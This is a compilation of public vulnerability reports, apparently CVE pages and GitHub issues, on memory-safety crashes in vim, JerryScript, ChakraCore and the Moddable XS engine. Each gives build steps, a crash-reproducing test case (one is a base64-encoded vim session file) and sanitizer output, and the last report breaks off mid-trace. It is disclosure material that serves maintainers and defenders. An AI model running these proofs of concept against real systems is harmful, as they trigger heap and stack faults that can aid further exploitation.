Out-of-bounds Read in Conda vim prior to 8.2.

**Description**

A heap-based OOB read of size 4 occurs when a user tries to open a vim session file specified below. This happens regardless of any command line options that could be specified to restrict vim, such -Z and -m. This bug has been found on default vim build (lastest commit hash `fd218c8a36e7ed33f7a205163690c5b7d2f31f8a`) on Ubuntu 20.04 for x86\_64/amd64.

**Proof of Concept**

Here is the smallest poc we were able to produce (it is base64 encoded since it contains some unprintable characters):

    $ echo -ne "CXdpMDAwMDAwMDA1MDAwMCA1MDAwMDAwMDAwMDAACiAgc2lsIW5vcm0ICAgICAgICBYXDrJPKgNn
    eW9leHQgFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBRsa25lCiAgc2lsIW5vcm0ICAgI9/f3
    MBYXGLJPKgNneXl5k/95eQEBAgEN/gb/3jABPQGEAQEBAT15eXl5eW1lpmUgZSsgeXlweXl5AXV1
    dXV1dXV1enUwdXV1dnV1" | base64 -d > poc
    $ vim -u NONE -i NONE -n -X -Z -e -m -s -S poc -c ':qa!'
    =================================================================
    ==67807==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000016500 at pc 0x7f4e10795f40 bp 0x7fffa0da2520 sp 0x7fffa0da1cc8
    READ of size 4 at 0x621000016500 thread T0
        #0 0x7f4e10795f3f in __interceptor_memmove (/lib/x86_64-linux-gnu/libasan.so.5+0xa0f3f)
        #1 0x5612382d840a in vim_memsave /home/faraday/vim/src/alloc.c:604
        #2 0x561238d26031 in u_save_line /home/faraday/vim/src/undo.c:373
        #3 0x561238d4665c in u_saveline /home/faraday/vim/src/undo.c:3477
        #4 0x561238d25615 in u_save /home/faraday/vim/src/undo.c:257
        #5 0x561238d254a4 in u_save_cursor /home/faraday/vim/src/undo.c:237
        #6 0x5612388b83c5 in op_addsub /home/faraday/vim/src/ops.c:2386
        #7 0x561238858e66 in nv_addsub /home/faraday/vim/src/normal.c:2302
        #8 0x56123884f61f in normal_cmd /home/faraday/vim/src/normal.c:1120
        #9 0x5612385ac525 in exec_normal /home/faraday/vim/src/ex_docmd.c:8638
        #10 0x5612385ac2e4 in exec_normal_cmd /home/faraday/vim/src/ex_docmd.c:8601
        #11 0x5612385ab802 in ex_normal /home/faraday/vim/src/ex_docmd.c:8519
        #12 0x56123856dd85 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2573
        #13 0x56123856170e in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
        #14 0x561238addf98 in do_source /home/faraday/vim/src/scriptfile.c:1512
        #15 0x561238adaf75 in cmd_source /home/faraday/vim/src/scriptfile.c:1098
        #16 0x561238adb132 in ex_source /home/faraday/vim/src/scriptfile.c:1124
        #17 0x56123856dd85 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2573
        #18 0x56123856170e in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
        #19 0x56123855f288 in do_cmdline_cmd /home/faraday/vim/src/ex_docmd.c:587
        #20 0x56123905a82d in exe_commands /home/faraday/vim/src/main.c:3091
        #21 0x56123904c323 in vim_main2 /home/faraday/vim/src/main.c:774
        #22 0x56123904b809 in main /home/faraday/vim/src/main.c:426
        #23 0x7f4e0ed440b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #24 0x5612382d7cbd in _start (/home/faraday/vim/src/vim+0x1259cbd)
    
    0x621000016500 is located 0 bytes to the right of 4096-byte region [0x621000015500,0x621000016500)
    allocated by thread T0 here:
        #0 0x7f4e10802bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
        #1 0x5612382d817e in lalloc /home/faraday/vim/src/alloc.c:248
        #2 0x5612382d7f29 in alloc /home/faraday/vim/src/alloc.c:151
        #3 0x561239062c5c in mf_alloc_bhdr /home/faraday/vim/src/memfile.c:884
        #4 0x56123905f03c in mf_new /home/faraday/vim/src/memfile.c:376
        #5 0x5612387bbbda in ml_new_data /home/faraday/vim/src/memline.c:4077
        #6 0x561238798cc5 in ml_open /home/faraday/vim/src/memline.c:394
        #7 0x561238304457 in open_buffer /home/faraday/vim/src/buffer.c:185
        #8 0x561239059185 in create_windows /home/faraday/vim/src/main.c:2861
        #9 0x56123904c02e in vim_main2 /home/faraday/vim/src/main.c:705
        #10 0x56123904b809 in main /home/faraday/vim/src/main.c:426
        #11 0x7f4e0ed440b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0xa0f3f) in __interceptor_memmove
    Shadow bytes around the buggy address:
      0x0c427fffac50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fffac60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fffac70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fffac80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fffac90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c427fffaca0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fffacb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fffacc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fffacd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427ffface0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fffacf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==67807==ABORTING
    

**Impact**

This vulnerability is capable disclosing data and might lead to bypass protection mechanisms facilitating successful exploitation of other memory corruption vulnerabilities that may lead to code execution.

**Acknowledgements**

This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.

CVE-2022-0319: Out-of-bounds Read in vim

Jerryscript 3.0.0 was discovered to contain a SEGV vulnerability via ecma_ref_object_inline in /jerry-core/ecma/base/ecma-gc.c.

**JerryScript revision**

Commit: 51da1551 Version: v3.0.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

./tools/build.py --clean --debug --profile=es2015-subset --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

**Test case**

function echo(str) {
  console.log(str);
}

function T(p, r, u) {
  return Object.assign(p, {
    then(onFulfilled, onRejected) {
      if (u) {
        onFulfilled(r);
      } else {
        onFulfilled();
      }

      return Promise.prototype.then.call(this, onFulfilled, onRejected);
    }
  });
}

function JSEtest(i) {
  var ps \= \[T(Promise.resolve('success'))\];
  Promise.all(ps).then(res \=> {
    echo(\`Test #${i} - Success with '${res}' (length = ${res.length}) (isArray = ${Array.isArray(res)})\`);
  }).catch(err \=> {
    echo(\`Test #${i} - Catch with ${err}\`);
  });
}

JSEtest(1);

​

**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js

ASAN:DEADLYSIGNAL
=================================================================
==95503==ERROR: AddressSanitizer: SEGV on unknown address 0x41b58ab0 (pc 0x566075cf bp 0x1ff7c4b0 sp 0xffbe2500 T0)
==95503==The signal is caused by a READ memory access.
    #0 0x566075ce in ecma\_ref\_object\_inline /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:136
    #1 0x56639c0c in ecma\_copy\_value /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:913
    #2 0x56639c0c in ecma\_fast\_copy\_value /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:940
    #3 0x566cdd0b in ecma\_op\_object\_find\_own /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:647
    #4 0x566d2ea0 in ecma\_op\_object\_find\_own /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:494
    #5 0x566d2ea0 in ecma\_op\_object\_get\_with\_receiver /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:879
    #6 0x567ef0cf in ecma\_op\_array\_get\_to\_string\_at\_index /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:273
    #7 0x567ef0cf in ecma\_builtin\_array\_prototype\_join /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:322
    #8 0x567ef0cf in ecma\_builtin\_array\_prototype\_dispatch\_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2940
    #9 0x566731f1 in ecma\_builtin\_dispatch\_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1543
    #10 0x566731f1 in ecma\_builtin\_dispatch\_call /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1574
    #11 0x566b48b4 in ecma\_op\_function\_call\_native\_built\_in /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1243
    #12 0x566bae4d in ecma\_op\_function\_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1444
    #13 0x5668d365 in ecma\_array\_object\_to\_string /root/jerryscript/jerry-core/ecma/operations/ecma-array-object.c:1228
    #14 0x5681e945 in ecma\_builtin\_intrinsic\_dispatch\_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-intrinsic.c:201
    #15 0x566731f1 in ecma\_builtin\_dispatch\_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1543
    #16 0x566731f1 in ecma\_builtin\_dispatch\_call /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1574
    #17 0x566b48b4 in ecma\_op\_function\_call\_native\_built\_in /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1243
    #18 0x566bae4d in ecma\_op\_function\_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1444
    #19 0x566c9572 in ecma\_op\_general\_object\_ordinary\_value /root/jerryscript/jerry-core/ecma/operations/ecma-objects-general.c:319
    #20 0x566c976b in ecma\_op\_general\_object\_default\_value /root/jerryscript/jerry-core/ecma/operations/ecma-objects-general.c:284
    #21 0x566d6875 in ecma\_op\_object\_default\_value /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:1780
    #22 0x566a905a in ecma\_op\_to\_string /root/jerryscript/jerry-core/ecma/operations/ecma-conversion.c:456
    #23 0x567b3433 in vm\_loop /root/jerryscript/jerry-core/vm/vm.c:2820
    #24 0x567e21da in vm\_execute /root/jerryscript/jerry-core/vm/vm.c:5260
    #25 0x567e7e7c in vm\_run /root/jerryscript/jerry-core/vm/vm.c:5363
    #26 0x566b4101 in ecma\_op\_function\_call\_simple /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1203
    #27 0x566bae25 in ecma\_op\_function\_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1439
    #28 0x566c495e in ecma\_process\_promise\_reaction\_job /root/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:221
    #29 0x566c495e in ecma\_process\_all\_enqueued\_jobs /root/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:563
    #30 0x565d4dbc in jerry\_run\_jobs /root/jerryscript/jerry-core/api/jerryscript.c:1064
    #31 0x565c004b in main /root/jerryscript/jerry-main/main-jerry.c:326
    #32 0xf76f1f20 in \_\_libc\_start\_main (/lib/i386-linux-gnu/libc.so.6+0x18f20)
    #33 0x565c9359  (/root/jerryscript/build/bin/jerry+0x3b359)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:136 in ecma\_ref\_object\_inline
==95503==ABORTING

Credits: Found by OWL337 team.

CVE-2022-22891: SEGV in ecma_ref_object_inline of ecma-gc.c · Issue #4871 · jerryscript-project/jerryscript

Jerryscript 3.0.0 was discovered to contain a stack overflow via vm_loop.lto_priv.304 in /jerry-core/vm/vm.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Stack-overflow in vm\_loop.lto\_priv.304 of vm.c #4901**

Closed

hope-fly opened this issue

Dec 13, 2021

· 0 comments · Fixed by #4945

Assignees

![@mnegyokru](https://avatars.githubusercontent.com/u/69792667?s=40&v=4)

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**JerryScript revision**

Commit: 42523bd6

Version: v3.0.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

python  ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-g --strip=off --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold --error-messages=on --line-info=on --stack-limit=10

**Test case**

function JSEtest() {
  new JSEtest();
}

try {
  JSEtest();
} catch (e) {
  print(e);
}

​

**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js

ASAN:DEADLYSIGNAL
=================================================================
==78723==ERROR: AddressSanitizer: stack-overflow on address 0xff0d8f90 (pc 0x566a456c bp 0xff0d95d8 sp 0xff0d8f90 T0)
    #0 0x566a456b in vm\_loop.lto\_priv.304 /root/jerryscript/jerry-core/vm/vm.c:975
    #1 0x56929645 in vm\_execute /root/jerryscript/jerry-core/vm/vm.c:5260
    #2 0x5692e592 in vm\_run /root/jerryscript/jerry-core/vm/vm.c:5363
    #3 0x5674524e in ecma\_op\_function\_call\_simple.lto\_priv.397 /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1203
    #4 0x567e8c9c in ecma\_op\_function\_construct\_simple /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1533
    #5 0x567e8c9c in ecma\_op\_function\_construct /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1769
    #6 0x5692995a in opfunc\_construct.isra.2 /root/jerryscript/jerry-core/vm/vm.c:844
    #7 0x5692995a in vm\_execute /root/jerryscript/jerry-core/vm/vm.c:5287
    #......
    
    #......
    #368 0x5692e592 in vm\_run /root/jerryscript/jerry-core/vm/vm.c:5363
    #369 0x5674524e in ecma\_op\_function\_call\_simple.lto\_priv.397 /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1203
    #370 0x567e8c9c in ecma\_op\_function\_construct\_simple /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1533
    #371 0x567e8c9c in ecma\_op\_function\_construct /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1769
    #372 0x5692995a in opfunc\_construct.isra.2 /root/jerryscript/jerry-core/vm/vm.c:844
    #373 0x5692995a in vm\_execute /root/jerryscript/jerry-core/vm/vm.c:5287

SUMMARY: AddressSanitizer: stack-overflow /root/jerryscript/jerry-core/vm/vm.c:975 in vm\_loop.lto\_priv.304
==78723==ABORTING

Credits: Found by OWL337 team.

mnegyokru added a commit to mnegyokru/jerryscript that referenced this issue

Dec 22, 2021

![@mnegyokru](https://avatars.githubusercontent.com/u/69792667?s=60&v=4)

mnegyokru added a commit to mnegyokru/jerryscript that referenced this issue

Dec 22, 2021

![@mnegyokru](https://avatars.githubusercontent.com/u/69792667?s=60&v=4)

mnegyokru added a commit to mnegyokru/jerryscript that referenced this issue

Jan 4, 2022

![@mnegyokru](https://avatars.githubusercontent.com/u/69792667?s=60&v=4)

… objects

This patch fixes jerryscript-project#4901

JerryScript-DCO-1.0-Signed-off-by: Martin Negyokru negyokru@inf.u-szeged.hu

mnegyokru added a commit to mnegyokru/jerryscript that referenced this issue

Jan 4, 2022

![@mnegyokru](https://avatars.githubusercontent.com/u/69792667?s=60&v=4)

… objects

This patch fixes jerryscript-project#4901

JerryScript-DCO-1.0-Signed-off-by: Martin Negyokru negyokru@inf.u-szeged.hu

dbatyai pushed a commit that referenced this issue

Jan 10, 2022

![@mnegyokru](https://avatars.githubusercontent.com/u/69792667?s=60&v=4)

… objects (#4945)

This patch fixes #4901

JerryScript-DCO-1.0-Signed-off-by: Martin Negyokru negyokru@inf.u-szeged.hu

CVE-2022-22893: Stack-overflow in vm_loop.lto_priv.304 of vm.c · Issue #4901 · jerryscript-project/jerryscript

Jerryscript 3.0.0 was discovered to contain a stack overflow via ecma_lcache_lookup in /jerry-core/ecma/base/ecma-lcache.c.

**JerryScript revision**

Commit: 51da1551

Version: v3.0.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --profile=es2015-subset --stack-limit=20

**Test case**

let array \= new Array(1);
array.splice(1, 0, array);
array.flat(Infinity);

​

**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc.js

ASAN:DEADLYSIGNAL
=================================================================
==26613==ERROR: AddressSanitizer: stack-overflow on address 0xff535ffc (pc 0x5661347c bp 0xff536090 sp 0xff536000 T0)
    #0 0x5661347b in ecma\_lcache\_lookup /root/jerryscript/jerry-core/ecma/base/ecma-lcache.c:144
    #1 0x569cde1f  (/root/jerryscript/build/bin/jerry+0x477e1f)

SUMMARY: AddressSanitizer: stack-overflow /root/jerryscript/jerry-core/ecma/base/ecma-lcache.c:144 in ecma\_lcache\_lookup
==26613==ABORTING

Credits: Found by OWL337 team.

CVE-2022-22894: Stack-overflow in ecma_lcache_lookup (ecma-lcache.c) · Issue #4890 · jerryscript-project/jerryscript

Jerryscript 3.0.0 was discovered to contain a stack overflow via ecma_op_object_find_own in /ecma/operations/ecma-objects.c.

**JerryScript revision**

4592143

**Build platform**

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86\_64)  
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --profile=es2015-subset --stack-limit=20

**Test case**

var once \= false;
var m \= 1;

function JSEtest(){
  if(!once){
    m \= new Array(1, 2, 3);
    this\[2\] \= m;
  }
  once \= true;
  return this\[2\] \= m;
}

JSON.parse("\[1, 2, \[4, 5\]\]", JSEtest);

**Execution steps & Output**

$ ./jerryscript/build/bin/jerry poc1.js

ASAN:DEADLYSIGNAL
=================================================================
==5376==ERROR: AddressSanitizer: stack-overflow on address 0xff3e5ff0 (pc 0x56722cec bp 0x00000000 sp 0xff3e5ff0 T0)
    #0 0x56722ceb in ecma\_op\_object\_find\_own /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:490
    #1 0x56a4ae1f  (/root/jerryscript/build/bin/jerry+0x46fe1f)

SUMMARY: AddressSanitizer: stack-overflow /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:490 in ecma\_op\_object\_find\_own
==5376==ABORTING

Credits: Found by OWL337 team.

CVE-2022-22888: Stack-overflow in ecma-objects (ecma_op_object_find_own) · Issue #4848 · jerryscript-project/jerryscript

There is an ASSERTION (pFuncBody->GetYieldRegister() == oldYieldRegister) failed in Js::DebugContext::RundownSourcesAndReparse in ChakraCore version 1.12.0.0-beta.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**ASSERTION (pFuncBody->GetYieldRegister() == oldYieldRegister) failed in Js::DebugContext::RundownSourcesAndReparse #6453**

Open

owl337 opened this issue

Jun 1, 2020

· 0 comments

**Comments**

![@owl337](https://avatars.githubusercontent.com/u/29652500?s=88&v=4)

**ChakraCore version:**

version 1.12.0.0-beta

**Build Commond**

./build.sh --debug

**OS**

Ubuntu 16.04.6 LTS (Linux 4.4.0-142-generic x86\_64)

**Test case**

    function test0() {
      var func2 = (async (xsbazt = hkvvxr(x)) => [...[
            -2,
          ]]);
      var a = -191;
      func3(a);
    }
    
    function Run(){
        WScript.Echo('PASSED');
    }
    
    
    WScript.Attach(Run);
    

**Output**

    ASSERTION 202914: (ChakraCore/lib/Runtime/Debug/DebugContext.cpp, line 359) pFuncBody->GetYieldRegister() == oldYieldRegister
     Failure: (pFuncBody->GetYieldRegister() == oldYieldRegister)
    Illegal instruction
    

Credits: This vulnerability is detected by chong from OWL337.

![@owl337](https://avatars.githubusercontent.com/u/29652500?s=60&v=4) owl337 changed the title DebugBreak in Js::DebugContext::RundownSourcesAndReparse ASSERTION (pFuncBody->GetYieldRegister() == oldYieldRegister) failed in Js::DebugContext::RundownSourcesAndReparse

Jun 1, 2020

2 participants

 ![@ppenzin](https://avatars.githubusercontent.com/u/3345781?s=52&v=4)![@owl337](https://avatars.githubusercontent.com/u/29652500?s=52&v=4)

CVE-2020-23315: ASSERTION (pFuncBody->GetYieldRegister() == oldYieldRegister) failed in Js::DebugContext::RundownSourcesAndReparse · Issue #6453 · chakra-core/ChakraCore

Moddable SDK v11.5.0 was discovered to contain a heap-buffer-overflow via xs/sources/xsDataView.c in fxUint8Getter.

**Moddable-XS revision**

Commit: db8f973

Version: 11.5.0 32 4

**Build environment**

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86\_64)

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

cd  ~/moddable/xs/makefiles/lin
#(debug)
make -f xst.mk 

**Test case**

var buf \= new ArrayBuffer(65552);
var numbers \= new Uint8Array(buf);
function v() {
    return 7;
}
function JSEtest(a, b) {
    return { valueOf: v };
}
numbers.sort(JSEtest);

**Execution & Output**

 $ ./xst poc.js

=================================================================
========ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f86d2bfe7ff at pc 0x5558b4ed93a4 bp 0x7fffebd25aa0 sp 0x7fffebd25a90
READ of size 1 at 0x7f86d2bfe7ff thread T0
    #0 0x5558b4ed93a3 in fxUint8Getter /root/moddable/xs/sources/xsDataView.c:2883
    #1 0x5558b4e8afbb in fxCompareTypedArrayItem /root/moddable/xs/sources/xsDataView.c:1234
    #2 0x5558b4e8e7d9 in fx\_TypedArray\_prototype\_sort /root/moddable/xs/sources/xsDataView.c:2303
    #3 0x5558b516fa1d in fxRunID /root/moddable/xs/sources/xsRun.c:842
    #4 0x5558b51d642c in fxRunScript /root/moddable/xs/sources/xsRun.c:4766
    #5 0x5558b53e48d1 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387
    #6 0x5558b4d1c05e in main /root/moddable/xs/tools/xst.c:281
    #7 0x7f86d6cd0bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #8 0x5558b4d1d789 in \_start (/root/moddable/build/bin/lin/debug/xst+0x93789)

0x7f86d2bfe7ff is located 1 bytes to the left of 16777248-byte region \[0x7f86d2bfe800,0x7f86d3bfe820)
allocated by thread T0 here:
    #0 0x7f86d773bb40 in \_\_interceptor\_malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xdeb40)
    #1 0x5558b50510cd in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/moddable/xs/sources/xsDataView.c:2883 in fxUint8Getter
Shadow bytes around the buggy address:
  0x0ff15a577ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff15a577cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff15a577cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff15a577cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ff15a577ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
\=>0x0ff15a577cf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\[fa\]
  0x0ff15a577d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff15a577d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff15a577d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff15a577d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff15a577d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\=======ABORTING

Credits: Found by OWL337 team.

CVE-2021-46332: Heap-buffer-overflow xs/sources/xsDataView.c:2883 in fxUint8Getter · Issue #752 · Moddable-OpenSource/moddable

Moddable SDK v11.5.0 was discovered to contain a SEGV vulnerability via the component _fini.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**SEGV (/usr/local/bin/xst+0xdfee5f) in \_fini #768**

Open

hope-fly opened this issue

Jan 7, 2022

· 1 comment

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Moddable-XS revision**

Commit: 2f93df29

Version: 11.5.0 32 4

**Build environment**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

cd  ~/moddable/xs/makefiles/lin
make -f xst.mk

**Test case**poc.js

    
    function JSEtest() {
        return { __proto__: setInterval(/a/g, "") } instanceof Array
            && !({ __proto__: null } instanceof Object);
    }
    
    if (!JSEtest())
        throw new Error("Test failed");
**Execution & Output**

$ ./moddable/build/bin/lin/debug/xst poc.js

Error: Test failed
AddressSanitizer:DEADLYSIGNAL
=================================================================
==50961==ERROR: AddressSanitizer: SEGV on unknown address 0x000000dfee60 (pc 0x000000dfee60 bp 0x7ffe67452190 sp 0x7ffe67452088 T0)

==50961==The signal is caused by a READ memory access.
==50961==Hint: PC is at a non-executable region. Maybe a wild jump?
    #0 0xdfee5f in \_fini (/usr/local/bin/xst+0xdfee5f)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/usr/local/bin/xst+0xdfee5f) in \_fini
==50961==ABORTING

Credits: Found by OWL337 team.

![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=88&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4)

Copy link

Collaborator

**![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=60&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4) **phoddie** commented Jan 8, 2022**

Thank you for the report!

The crash occurs in after the test exits. The call to fxDeleteMachine crashes when calls the destructor of the timer created by `setInterval`.

while (bSlot < cSlot) {
	if ((bSlot->kind == XS\_HOST\_KIND) && (bSlot->value.host.variant.destructor)) {
		if (bSlot->flag & XS\_HOST\_HOOKS\_FLAG) {
			if (bSlot->value.host.variant.hooks\->destructor)
				(\*(bSlot->value.host.variant.hooks\->destructor))(bSlot->value.host.data);
		}
		else
			(\*(bSlot->value.host.variant.destructor))(bSlot->value.host.data);
	}
	bSlot++;
}

This may be a bug in the `xst` tool rather than the XS engine. Either way, we'll fix that so it doesn't get in the way of testing.

mkellner pushed a commit that referenced this issue

Jan 17, 2022

2 participants

 ![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46329: SEGV (/usr/local/bin/xst+0xdfee5f) in _fini · Issue #768 · Moddable-OpenSource/moddable

Moddable SDK v11.5.0 was discovered to contain a heap-buffer-overflow via the component __libc_start_main.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Heap-buffer-overflow in \_\_libc\_start\_main #751**

Closed

hope-fly opened this issue

Dec 14, 2021

· 1 comment

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Moddable-XS revision**

Commit: db8f973

Version: 11.5.0 32 4

**Build environment**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

cd  ~/moddable/xs/makefiles/lin
make debug

**Test case**

function JSEtest(x, n) {
    while (x.length < n) {
        x += x;
    }
    return x.substring(0, n);
}

var x \= JSEtest("1", 1 << 20);
var rep \= JSEtest("$1", 1 << 16);
var y \= x.replace(/(.+)/g, rep);
y.length;

**Execution & Output**

 $ ./xst test.js

=================================================================
ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f62dd0fe820 at pc 0x7f62e0bf477a bp 0x7ffd65c0fc60 sp 0x7ffd65c0f408
WRITE of size 1048576 at 0x7f62dd0fe820 thread T0
    #0 0x7f62e0bf4779  (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0x79779)
